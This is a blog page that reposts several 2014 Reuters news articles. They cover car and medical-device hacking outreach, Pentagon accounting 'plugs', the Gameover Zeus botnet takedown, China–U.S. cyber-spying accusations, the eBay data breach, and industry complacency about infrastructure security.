On Tuesday, the group talked about hacking cars and medical devices with industry representatives in a private meeting in Las Vegas. They agreed not to publicly discuss those sessions.
Katie Moussouris, a Cavalry leader who is an executive at a startup known as HackerOne, said she encourages hackers to show empathy when approaching companies.

"It is important to show that you are not just trying to show their weakness and make them look stupid, but that you are trying to help," said Moussouris, who until recently ran outreach to security researchers for Microsoft Corp.
Wade Newton, a spokesman for the Auto Alliance, which represents 12 car makers, declined to comment on Cavalry's efforts to reach out to the industry. "Our record shows that we typically welcome the opportunity to work with a broad array of stakeholders when we have a common goal," he said.
The U.S. National Highway Traffic Safety Administration said in a statement that it is not aware of any incidents of consumer vehicle control systems that have been hacked.
Not all researchers believe in Cavalry's conciliatory approach. Charlie Miller, who co-authored the study on "most hackable" cars, said he does not think automakers will take serious action to improve security until they are shamed into doing so by someone who demonstrates code capable of remotely attacking a car and causing it to crash.
"They say they know what they are doing. But all the evidence points to the contrary," said Miller.
Jeff Moss, who founded Def Con 22 years ago and is now an advisor to the U.S. Department of Homeland Security, said there are merits to both approaches.
"Either side has a valid argument," Moss said. "It's almost like a carrot and stick approach."
(Corrects spelling of Cavalry in paragraphs 2 and 5)
Read more ...

Sunday, 15 June 2014

Senators urge Pentagon to end systematic faking of its accounts

Aerial view of the United States military headquarters, the Pentagon, September 28, 2008.
(Reuters) - Four senators have called on the Defense Department to end a practice that involves deliberately inserting false numbers into the Pentagon's accounting ledgers and financial reports. The senators sent a letter to Defense Department Comptroller Robert Hale urging the Pentagon to stop an accounting practice widely known as "plugging." The letter, dated June 12, 2014, said that plugs are fictitious dollar amounts inserted into financial ledgers to make it appear that the Pentagon’s books balance. The letter ( was sent by Charles Grassley, Tom Coburn, Thomas Carper and Ron Johnson. The four senators have been pressing for a solution to severe accounting problems at the Pentagon, whose spending accounts for the largest chunk by far of the annual federal budget approved by Congress. Grassley is the senior Republican on the Senate Judiciary Committee; the others hold top positions on the Homeland Security and Governmental Affairs Committee. The senators said that plugs, called "reconciling amounts" by the Pentagon, totaled $9.6 billion in 2013 - an 80% increase since 2008. The letter asked Hale and Pentagon Inspector General Jon Rymer to provide the senators with a plan to end the practice, including a specific timetable. The legislators criticized the Office of the Inspector General - the internal Pentagon unit charged with policing the agency - for using more than $200 million worth of plugs to balance its own accounts. "In order to play a leadership role in financial management reform, the DoD OIG should start by ending the use of plugging in its own financial statements," they wrote. The Pentagon's practice of faking its budget numbers was the subject of a Reuters investigation last year on accounting malpractice at the Defense Department. The Senate letter to Hale and Rymer cited the findings of the Reuters series. (here#article/part2) "The department will respond to the letter in an appropriate manner," a Pentagon spokesman said. Michael Thiem, spokesman for the inspector general, said: "At the office of the inspector general, we are committed to accurate and transparent financial reporting." He said the office would continue "aggressive oversight" of the Defense Department to improve accounting systems. (Edited by Michael Williams)
Read more ...

Tuesday, 3 June 2014

U.S. disrupts major hacking, extortion ring; Russian charged

U.S. Assistant Attorney General Leslie Caldwell (at podium) of the Justice Department's Criminal Division announces criminal charges and two global cyber fraud disruptions, Gameover Zeus and Cyrptolocker, at the Department of Justice in Washington June 2, 2014.
(Reuters) - A U.S.-led international operation disrupted a crime ring that infected hundreds of thousands of PCs around the globe with malicious software used for stealing banking credentials and extorting computer owners, the Justice Department said on Monday. Authorities in nearly a dozen countries worked with private security companies to wrest control of the network of infected machines, known by the name of its master software, Gameover Zeus. Court documents released on Monday said that between 500,000 and 1 million machines worldwide were infected with the malicious software, which was derived from the original "Zeus" trojan for stealing financial passwords that emerged in 2006. In addition to stealing from the online accounts of businesses and consumers, the Gameover Zeus crew installed other malicious programs, including one called Cryptolocker that encrypted files and demanded payments for their release. Cryptolocker alone infected more than 234,000 machines and won $27 million in ransom payments, the Justice Department said. The two programs together brought the gang more than $100 million, prosecutors said in court documents, including $198,000 in an unauthorized wire transfer from an unnamed Pennsylvania materials company and $750 in ransom from a police department in Massachusetts that had its investigative files encrypted. Other victims included PNC Bank [], Capital One Bank [COFCB.UL] and others, according to court documents. “These schemes were highly sophisticated and immensely lucrative, and the cyber criminals did not make them easy to reach or disrupt,” Leslie Caldwell, who heads the Justice Department's criminal division, told a news conference. The Gameover Zeus "botnet" - short for robot network - is the largest so far disrupted that relied on a peer-to-peer distribution method, where thousands of computers could reinfect and update each other, said Dell expert Brett Stone-Gross, who assisted the FBI. "We took control of the bots, so they would only talk with our infrastructure," Stone-Gross said. A civil suit in Pennsylvania helped authorities get court orders to seize parts of the infected network, and on May 7, Ukrainian authorities seized and copied Gameover Zeus command servers in Kiev and Donetsk, officials said. U.S. and other agents worked from early Friday through the weekend to seize servers around the world, freeing some 300,000 victim computers from the botnet so far. A criminal complaint unsealed today in Nebraska, meanwhile, accused Russian Evgeniy Mikhaylovich Bogachev and others of participating in the conspiracy. U.S. officials said Bogachev was last known to be living in the Black Sea resort town of Anapa. In an FBI affidavit filed in the Nebraska case, an agent cited online chats in which aliases associated with Bogachev claimed authorship of the original Zeus trojan, which has infected more than 13 million computers and is blamed for hundreds of millions of dollars in losses. "That's what he claimed. There were probably a number of people involved," said Dmitri Alperovitch, co-founder of security firm CrowdStrike, which also worked with the FBI. A person familiar with the case said that Bogachev's ICQ number, which is an assigned Internet chat query identifier, matched that of the known Zeus author. Attempts to reach Bogachev were unsuccessful. FBI and Justice Department officials did not immediately respond to questions about Bogachev's alleged past role with Zeus, one of the most pernicious pieces of software ever developed. Zeus's code has since been publicly released, and many variants are still being used by gangs large and small. "Zeus is probably the most prolific and effective piece of malware discovered since 2006," said Lance James, head of cyber-intelligence at consultancy Deloitte & Touche, which also helped authorities. Russia does not extradite accused criminals to other countries, so Bogachev may never be arrested. He was named as part of a new policy on aggressively exposing even those the United States has little hope of catching. The recent crackdown includes the indictment of five members of China's People's Liberation Army for alleged economic espionage, which prompted denials and an angry response from Chinese authorities. “This is the new normal,” Robert Anderson, the top FBI official in charge of combating cyber crime said at a news conference announcing the Russian action. When asked whether Russian authorities would turn Bogachev over to the U.S., Deputy Attorney General James Cole said “as far as Russia, we are in contact with them and we’ve been having discussions with them about moving forward and about trying to get custody of Mr. Bogachev,” but declined to provide further detail of those talks. The shutdown of Gameover Zeus may not last. Other botnets have resurfaced as criminals regained at least partial control of their networks. Officials at the United Kingdom's National Crime Agency said in an "urgent warning" that users might have only two weeks to clean their computers from traces of the infection. They directed users to, which was intermittently available late Monday. The U.S. Department of Homeland Security set up a website to help victims remove the malware, The European Cybercrime Centre also participated in the operation, along with Australia, Canada, France, Germany, Italy, Japan, Luxembourg, New Zealand, Ukraine. Intel Corp, Microsoft Corp, security software companies F-Secure, Symantec Corp, and Trend Micro; and Carnegie Mellon University supported the operation. (Additional reporting by Julie Edwards and Alina Selyukh; Editing by Jonathan Oatis and Ken Wills)

Related posts:

Read more ...

Tuesday, 27 May 2014

China report slams U.S. for 'unscrupulous' surveillance

A magnifying glass is held in front of a computer screen in this picture illustration taken in Berlin May 21, 2013.

(Reuters) - Beijing accused the United States on Monday of "unscrupulous" cyber surveillance that included large-scale computer attacks against the Chinese government and Chinese companies.
"America's spying operations have gone far beyond the legal rationale of "anti-terrorism" and have exposed the ugly face of its pursuit of self-interest in complete disregard for moral integrity," concluded a report prepared by the China Academy of Cyber Space.
The report, titled "America's Global Surveillance Record," was published one week after the United States accused five Chinese military officers of hacking into U.S. companies to steal trade secrets.
The publication accused the United States of "waging large-scale cyber-attacks" against China. "Targets of American surveillance include the Chinese government and Chinese leaders, Chinese companies, scientific research institutes, ordinary netizens, and a large number of cell phone users," the report said.
Huawei Technologies Co, the Ministry of Commerce, the Ministry of Foreign Affairs, and Tencent Holdings Ltd's popular instant message service were among NSA targets, it said.
"U.S. spying operations penetrate every corner of China," the report said.
China last week summoned the U.S. Ambassador to China, Max Baucus, to protest against the U.S. indictment, saying it had seriously harmed relations.
The Cyber Space academy report cited foreign newspaper reports of U.S. cyber spying based on documents revealed by former National Security Agency contractor Edward Snowden.
A subsequent investigation "carried out by various Chinese government departments over several months confirmed the existence of snooping activities directed against China," the report said.
(Reporting by Matthew Miller; Editing by Ruth Pitchford)
Read more ...

Thursday, 22 May 2014

Hackers raid eBay in historic breach, access 145 million records

John Donahoe, chief executive of eBay, speaks at the Reuters Global Technology Summit in San Francisco, June 17, 2013.

(Reuters) - EBay Inc said that hackers raided its network three months ago, accessing some 145 million user records in what is poised to go down as one of the biggest data breaches in history, based on the number of accounts compromised.
It advised customers to change their passwords immediately, saying they were among the pieces of data stolen by cyber criminals who carried out the attack between late February and early March.
EBay spokeswoman Amanda Miller told Reuters late on Wednesday that those passwords were encrypted and that the company had no reason to believe the hackers had broken the code that scrambled them.
"There is no evidence of impact on any eBay customers," Miller said. "We don't know that they decrypted the passwords because it would not be easy to do."
She said the hackers gained access to 145 million records of which they copied "a large part". Those records contained passwords as well as email addresses, birth dates, mailing addresses and other personal information, but not financial data such as credit card numbers.
Miller also said the company has hired FireEye Inc's Mandiant forensics division to help investigate the matter. Mandiant is known for publishing a February 2013 report that described what it said was a Shanghai-based hacking group linked to the Peoples Liberation Army.
EBay earlier said a large number of accounts may have been compromised, but declined to say how many.
Security experts advised EBay customers to be on the alert for fraud, especially if they used the same passwords for other accounts.
"People need to stop reusing passwords and should change their affected passwords immediately across all the sites where they are used," said Trey Ford, global security strategist with cybersecurity firm Rapid7.
Michael Coates, director of product security with Shape Security, said there is a significant risk that the hackers would unscramble the passwords because typically companies only ask users to change passwords if they believe there is a reasonable chance attackers may be able to do so.
Still, eBay said it had not seen any indication of increased fraudulent activity on its flagship site and that there was no evidence its PayPal online payment service had been breached.
EBay said the hackers got in after obtaining login credentials for "a small number" of employees, allowing them to access eBay's corporate network.
It discovered the breach in early May and immediately brought in security experts and law enforcement to investigate, Miller said.
"We worked aggressively and as quickly as possible to insure accurate and thorough disclosure of the nature and extent of the compromise," Miller said when asked why the company had not immediately notified users.
The breach could go down as the second-biggest in history at a U.S. company, based on the number records accessed by the hackers.
Computer security experts say the biggest such breach was uncovered at software maker Adobe Systems Inc in October 2013, when hackers accessed about 152 million user accounts.
It would be larger than the one that Target Corp disclosed in December of last year, which included some 40 million payment card numbers and another 70 million customer records.
(This version of the story corrects the first, fifth and third-to-last paragraph after company corrects its statement to say that 145 million records were accessed, but hackers only copied "a large part" of that database. Story originally said that hackers copied the entire database.
(Additional Reporting by Joseph Menn; Editing by Christopher Cushing)
Read more ...

Monday, 19 May 2014

U.S. accuses China of cyber spying on six American companies

A map of China is seen through a magnifying glass on a computer screen showing binary digits in Singapore in this January 2, 2014 photo illustration.

(Reuters) - A U.S. grand jury has indicted five Chinese individuals with cyber espionage charges for allegedly targeting six American companies and stealing trade secrets, the U.S. Justice Department said, publicly accusing China of cyber spying for the first time.
The hackers targeted U.S. companies in the nuclear power, metals and solar products industries to steal information useful to competitors in China, the department said on Monday.
The companies targeted include Alcoa Inc, United States Steel Corp, Allegheny Technologies Inc, Westinghouse Electric Co and U.S. subsidiaries of SolarWorld AG, U.S. officials said.
The hackers also targeted United Steel, Paper and Forestry, Rubber, Manufacturing, Energy, Allied-Industrial and Service Workers International Union (USW), officials said.
The hackers targeted U.S. companies in the nuclear power, metals and solar products industries to steal information useful to competitors in China, the department said.
More details were expected at a news conference later Monday with Attorney General Eric Holder and other U.S. officials.
The move "indicates that DOJ has 'smoking keyboards' and (is) willing to bring the evidence to a court of law and be more transparent," said Frank Cilluffo, head of the Homeland Security Policy Institute at the George Washington University.
American officials have long been concerned about hacking from abroad, especially China. Secret U.S. State Department cables obtained by WikiLeaks traced major systems breaches to China, Reuters reported in 2011. One 2009 cable pinpointed attacks to a specific unit of China's People's Liberation Army.
Such charges, however, are symbolic but the move would prevent the individuals indicted from traveling to the United States or other countries that have an extradition agreement with the United States.
Several cyber security experts said Monday's action showed the United States was serious about tackling the hacking concerns.
"It sends a strong message to the Chinese," a senior fellow at the Center for Strategic and International studies James Lewis told Reuters.
Others some remained skeptical the move would deter online invasions.
"It won't slow China down," said Eric Johnson, an information technology expert at Vanderbilt University and dean of its School of Management.
An FBI official last week told Reuters to expect multiple cyber security-related cases, including indictments and arrests, in the coming weeks.
On Sunday, a top Chinese Internet official called for Beijing to tighten its own cyber security, citing "overseas hostile forces.
(Additional reporting by Susan Heavey and Mark Hosenball and Jim Finkle in Boston; Editing by Bernadette Baum)
Read more ...

Saturday, 17 May 2014

U.S. industry too complacent about cyber risks, say experts

Digital Bond Founder and CEO Dale Peterson talks during a Reuters CyberSecurity Summit in Washington, May 12, 2014.

Reuters) - After warning for years that the U.S. electric grid and other critical infrastructure are dangerously vulnerable to hacking, security experts fear it may take a major destructive attack to jolt CEOs out of their complacency.
While awareness about cybersecurity has increased in recent years, infrastructure consultants say the industry remains reluctant to spend the money needed to upgrade their aging equipment - especially in the absence of much pressure from the U.S. government, regulators or shareholders.
"I'm convinced the C-level executives don't understand the risks they're accepting,'" Digital Bond CEO Dale Peterson, a leading expert in industrial control systems, told the Reuters Cybersecurity Summit in Washington this week.
"These systems are insecure by design," said Peterson. "If they truly understood the risk they were taking, they would find it unacceptable."
Peterson and other security experts say the problem lies with tiny computers known as PLCs, or programmable logic controllers, used to control processes in energy plants, water treatment facilities, factories and other industries. The PLCs are designed to blindly obey all commands, regardless of what impact they might have, according to the experts.
To wreak havoc, someone would need only to hack into that system and send malicious instructions to the PLC, such as to cause an explosion at an energy facility or chemical plant, flood a water system, or poison food supply.
Top executives at critical infrastructure companies think of cybersecurity as a standard business risk and are reluctant to spend millions of dollars to mitigate that risk, said Stuart McClure, chief executive of cybersecurity firm Cylance.
They "can't seem to get out of their own way of paranoia to a point of paralysis," McClure told the summit. "What government does have to do, unfortunately, is to step in and provide a stick of some sort."
The Obama administration has encouraged industries to test themselves against a newly drafted set of cyber standards, and has encouraged more sharing of information about cyber threats and best practices.
Experts say that is a step in the right direction, but there is still a long way to go. Some urged the Department of Homeland Security to mandate stricter regulations, but the agency does not have that kind of enforcement power.
"I think what they benefit most from is not just hard and fast regulation: 'You shall do it this way,'" Department of Homeland Security Jeh Johnson said at the summit. "I don't believe that the answer is to regulate standards."
DHS's Industrial Control Systems Cyber Emergency Response Team says it responded to reports of 256 cyber incidents last year, more than half of them in the energy sector. While that is nearly double the agency's 2012 case load, there was not a single incident that caused a major disruption.
The incidents include hacking into systems through Internet portals exposed over the Web, injecting malicious software through thumb drives, and exploitation of software vulnerabilities, DHS said.
"I fear that things won't change until there is a major attack and people are shocked into taking action," McClure said.
Still, he and several other summit guests said they have noticed an increase in interest in cybersecurity following the data breach at Target Corp (TGT.N), which led to the departure of the U.S. retailer's chief executive, Gregg Steinhafel.
"This is ringing bells at the C-suite," said Charles Croom, vice president of cybersecurity solutions at Lockheed Martin Corp (LMT.N). "This is just the beginning of a bow wave."
While some security experts hope the government can take a stronger role on cybersecurity, some U.S. officials say the private sector needs to step up.
The new head of the National Security Agency, Admiral Mike Rogers, said he hopes industry and the government can work quickly enough to improve communication about emerging cyber threats and prevent catastrophes.
"I don't want a major disaster being the driver that pushes us," Rogers told the summit.
(Reporting by Jim Finkle and Alina Selyukh; Additional reporting by Doina Chiacu, Mark Hosenball, Joseph Menn and Andrea Shalal; Editing by Tiffany Wu)
Read more ...


Related Posts Plugin for WordPress, Blogger...